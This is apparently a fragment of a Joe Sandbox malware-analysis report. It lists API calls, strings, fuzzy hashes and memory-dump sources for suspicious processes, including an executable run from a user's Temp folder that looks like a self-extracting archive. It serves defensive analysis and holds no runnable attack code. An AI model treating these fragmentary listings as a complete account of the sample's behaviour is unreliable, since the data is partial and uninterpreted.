                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: 618109b13354653d4075f8de91e2ddc6437c53cdc923ec028cbc3354f56059a7
                                                                                              • Instruction ID: 12a8468efbb0ca741681e9799bac3ce557e93737eaceeef35de5a67537ea2297
                                                                                              • Opcode Fuzzy Hash: 618109b13354653d4075f8de91e2ddc6437c53cdc923ec028cbc3354f56059a7
                                                                                              • Instruction Fuzzy Hash: 5EF01D32008054BBCF226F51EC09D8E7F26EB44B61B119416F61A5A061CB72D661E794
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C8891E
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C88930
                                                                                              • _free.LIBCMT ref: 00C88943
                                                                                              • _free.LIBCMT ref: 00C88954
                                                                                              • _free.LIBCMT ref: 00C88965
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ba66802b938809774ef88fa0eeb341d94aeecf8c68458e8a815676ec78c07d89
                                                                                              • Instruction ID: e271739e002192b4c8907d710a04b9a4272c4e3177f25627b0c28f213798c889
                                                                                              • Opcode Fuzzy Hash: ba66802b938809774ef88fa0eeb341d94aeecf8c68458e8a815676ec78c07d89
                                                                                              • Instruction Fuzzy Hash: 82F0DA72810523DB8B46BF14FD06B1D3BA2F724738782054BF524567B1CF714946AB99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: eb7eebdef4f5204e72e790102030b83843898cc09a1cbb5f5c6d7a7d9910c821
                                                                                              • Instruction ID: a12136d121c8c08317351016555e53628a70ecf659c868a666f5b395f7d346bc
                                                                                              • Opcode Fuzzy Hash: eb7eebdef4f5204e72e790102030b83843898cc09a1cbb5f5c6d7a7d9910c821
                                                                                              • Instruction Fuzzy Hash: 52510635288304F6EA351AADCD46F357665EB05B04F2CC507FF9E740E1D9A2A910B71B
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\rqbprm.exe,00000104), ref: 00C87FAE
                                                                                              • _free.LIBCMT ref: 00C88079
                                                                                              • _free.LIBCMT ref: 00C88083
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                              • API String ID: 2506810119-1769970242
                                                                                              • Opcode ID: cfb83c99cb8a6544fbdc0ed50004aae5f96be3583c908f474e7b34421920464c
                                                                                              • Instruction ID: 3dbf7cf4435b807737978c991af13b1535056d35bc20e3a07b16bd685a3997b1
                                                                                              • Opcode Fuzzy Hash: cfb83c99cb8a6544fbdc0ed50004aae5f96be3583c908f474e7b34421920464c
                                                                                              • Instruction Fuzzy Hash: 4131D171A00218AFCB21EF99DC81EAEBBFCEF95308F5041A6F50497211DB708E48DB64
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00C831FB
                                                                                              • _abort.LIBCMT ref: 00C83306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: 399a855455ee728c1a1d00965ffb5034b6ccb43de124892c90939ddbf609df87
                                                                                              • Instruction ID: 899c67eb2e1bf266f9e7e6a46bd379ddf41e5878b669396178daaa57fc06be53
                                                                                              • Opcode Fuzzy Hash: 399a855455ee728c1a1d00965ffb5034b6ccb43de124892c90939ddbf609df87
                                                                                              • Instruction Fuzzy Hash: EA416A71900249AFCF15EF94CC81AEEBBB5FF08708F148059F91467262D335AA51DB58
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C67406
                                                                                                • Part of subcall function 00C63BBA: __EH_prolog.LIBCMT ref: 00C63BBF
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00C674CD
                                                                                                • Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
                                                                                                • Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
                                                                                                • Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 3813983858-639343689
                                                                                              • Opcode ID: 748f049f14df0143ccadaf760c21d7bf6c019ff7a0c261ce4fbc4c07028dd1be
                                                                                              • Instruction ID: 6287a1bfa2aa39ecbcc7ba71fecf69a63aa7c34cfd74922295f58ac426cef7db
                                                                                              • Opcode Fuzzy Hash: 748f049f14df0143ccadaf760c21d7bf6c019ff7a0c261ce4fbc4c07028dd1be
                                                                                              • Instruction Fuzzy Hash: 3B31C671D04258AADF31EBA4DC89FFE7BA8AF05308F044555F856A7182DB748B44DB60
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7AD98
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00C7ADAD
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7ADC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00C6D954
                                                                                              • _strncpy.LIBCMT ref: 00C6D99A
                                                                                                • Part of subcall function 00C71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CA1030,00000200,00C6D928,00000000,?,00000050,00CA1030), ref: 00C71DC4
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E85
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E8F
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E9F
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00C70EB7
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7B2BE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00C7B2D6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00C7B304
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00C67F69,?,?,?), ref: 00C6A3FA
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00C67F69,?), ref: 00C6A43E
                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00C67F69,?,?,?,?,?,?,?), ref: 00C6A4BF
                                                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00C67F69,?,?,?,?,?,?,?,?,?,?), ref: 00C6A4C6
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00C891E0,?,00000000,?,00000001,?,?,00000001,00C891E0,?), ref: 00C8C9D5
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C8CA5E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00C86CBE,?), ref: 00C8CA70
                                                                                              • __freea.LIBCMT ref: 00C8CA79
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00C7A666
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C7A675
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C7A683
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00C7A691
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              APIs
                                                                                                • Part of subcall function 00C7A699: GetDC.USER32(00000000), ref: 00C7A69D
                                                                                                • Part of subcall function 00C7A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C7A6A8
                                                                                                • Part of subcall function 00C7A699: ReleaseDC.USER32(00000000,00000000), ref: 00C7A6B3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00C7A83C
                                                                                                • Part of subcall function 00C7AAC9: GetDC.USER32(00000000), ref: 00C7AAD2
                                                                                                • Part of subcall function 00C7AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00C7AB01
                                                                                                • Part of subcall function 00C7AAC9: ReleaseDC.USER32(00000000,?), ref: 00C7AB99
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C8B324
                                                                                                • Part of subcall function 00C89097: IsProcessorFeaturePresent.KERNEL32(00000017,00C89086,00000050,00C93A34,?,00C6D710,00000004,00CA1030,?,?,00C89093,00000000,00000000,00000000,00000000,00000000), ref: 00C89099
                                                                                                • Part of subcall function 00C89097: GetCurrentProcess.KERNEL32(C0000417,00C93A34,00000050,00CA1030), ref: 00C890BB
                                                                                                • Part of subcall function 00C89097: TerminateProcess.KERNEL32(00000000), ref: 00C890C2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2667617558-3972193922
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C675E3
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                                • Part of subcall function 00C6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C6777F
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              APIs
                                                                                                • Part of subcall function 00C6F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C6F2E4
                                                                                                • Part of subcall function 00C6F2C5: GetProcAddress.KERNEL32(00CA81C8,CryptUnprotectMemory), ref: 00C6F2F4
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00C6F33E), ref: 00C6F3D2
                                                                                              Strings
                                                                                              • CryptProtectMemory failed, xrefs: 00C6F389
                                                                                              • CryptUnprotectMemory failed, xrefs: 00C6F3CA
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C6B9B8
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,00C71160,?,00000000,00000000), ref: 00C71043
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00C7108A
                                                                                                • Part of subcall function 00C66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C66C54
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              APIs
                                                                                                • Part of subcall function 00C6E2E8: _swprintf.LIBCMT ref: 00C6E30E
                                                                                                • Part of subcall function 00C6E2E8: _strlen.LIBCMT ref: 00C6E32F
                                                                                                • Part of subcall function 00C6E2E8: SetDlgItemTextW.USER32(?,00C9E274,?), ref: 00C6E38F
                                                                                                • Part of subcall function 00C6E2E8: GetWindowRect.USER32(?,?), ref: 00C6E3C9
                                                                                                • Part of subcall function 00C6E2E8: GetClientRect.USER32(?,?), ref: 00C6E3D5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                              • SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              • Opcode ID: f2329af900bc5e12ed2efd742944041ac38dd471b3cfad07a7a1e0fd7f142911
                                                                                              • Instruction ID: c3e82e79657528ee2b3b107e39cffe2f158cd9ffd8846af94a44b599f6a2352f
                                                                                              • Opcode Fuzzy Hash: f2329af900bc5e12ed2efd742944041ac38dd471b3cfad07a7a1e0fd7f142911
                                                                                              • Instruction Fuzzy Hash: 65F0AF701042C8AADF650F61DC8DBEE3B69AF04346F0C8124FC57506B1CB74CA90EB10
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00C71206,?), ref: 00C70FEA
                                                                                              • GetLastError.KERNEL32(?), ref: 00C70FF6
                                                                                                • Part of subcall function 00C66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C66C54
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00C70FFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 75bd952e42b65238fe3e53843ceeff8d44d73bb2cbcb4774ecb746345e6de021
                                                                                              • Instruction ID: fdd0049a96ae75760453c26b609a012cb7ac1d561cf8a56ec66a6e661abfdbfe
                                                                                              • Opcode Fuzzy Hash: 75bd952e42b65238fe3e53843ceeff8d44d73bb2cbcb4774ecb746345e6de021
                                                                                              • Instruction Fuzzy Hash: 98D05E725089717ACA203338AC4EE6F3904AB22731F644715F639662F6CB254E92A692
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00C6DA55,?), ref: 00C6E2A3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00C6DA55,?), ref: 00C6E2B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: db047c09df61b4148261d0293e4ffc96be7956488bec4013005781156866688d
                                                                                              • Instruction ID: fdbfb821d26cffbb0216146d07ec13939bb19d28724e1a8a5a42dbc5cac6e405
                                                                                              • Opcode Fuzzy Hash: db047c09df61b4148261d0293e4ffc96be7956488bec4013005781156866688d
                                                                                              • Instruction Fuzzy Hash: 8EC08C3124079066EB3027B47C4EF8B6F585B01B15F09149EBA81EA2E1DFE6CA80C7E0

                                                                                              Execution Graph

                                                                                              Execution Coverage:18.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 2692 7ffaac48831e 2693 7ffaac48832c GetConsoleWindow 2692->2693 2695 7ffaac4885c3 2693->2695

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 143 7ffaac48831e-7ffaac488379 147 7ffaac48837b 143->147 148 7ffaac48837c-7ffaac4883cc 143->148 147->148 150 7ffaac4883d3-7ffaac4883eb 148->150 151 7ffaac4883ce 148->151 152 7ffaac4883f9-7ffaac488443 150->152 153 7ffaac4883ed-7ffaac4883f6 150->153 151->150 157 7ffaac488445-7ffaac48844e 152->157 158 7ffaac488451-7ffaac488479 152->158 153->152 157->158 160 7ffaac488487-7ffaac4884fd 158->160 161 7ffaac48847b-7ffaac488484 158->161 164 7ffaac4884ff 160->164 165 7ffaac488500-7ffaac4885c1 GetConsoleWindow 160->165 161->160 164->165 170 7ffaac4885c3 165->170 171 7ffaac4885c9-7ffaac488619 165->171 170->171
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000019.00000002.2139433427.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_25_2_7ffaac480000_cnvwov.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2863861424-0
                                                                                              • Opcode ID: f86e20c7939f0d915d571a58c0dc0b148bccd8c9e1ba612babaf20542232f812
                                                                                              • Instruction ID: d3fcd2023d2505bfdcb81d8aed2376f25780306fab55c265763e97bab2564cce
                                                                                              • Opcode Fuzzy Hash: f86e20c7939f0d915d571a58c0dc0b148bccd8c9e1ba612babaf20542232f812
                                                                                              • Instruction Fuzzy Hash: 92B17D70908A5C8FDF99EF68C854AEDBBF1FF5A300F1441AAD00DD7292CA35A945CB40
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
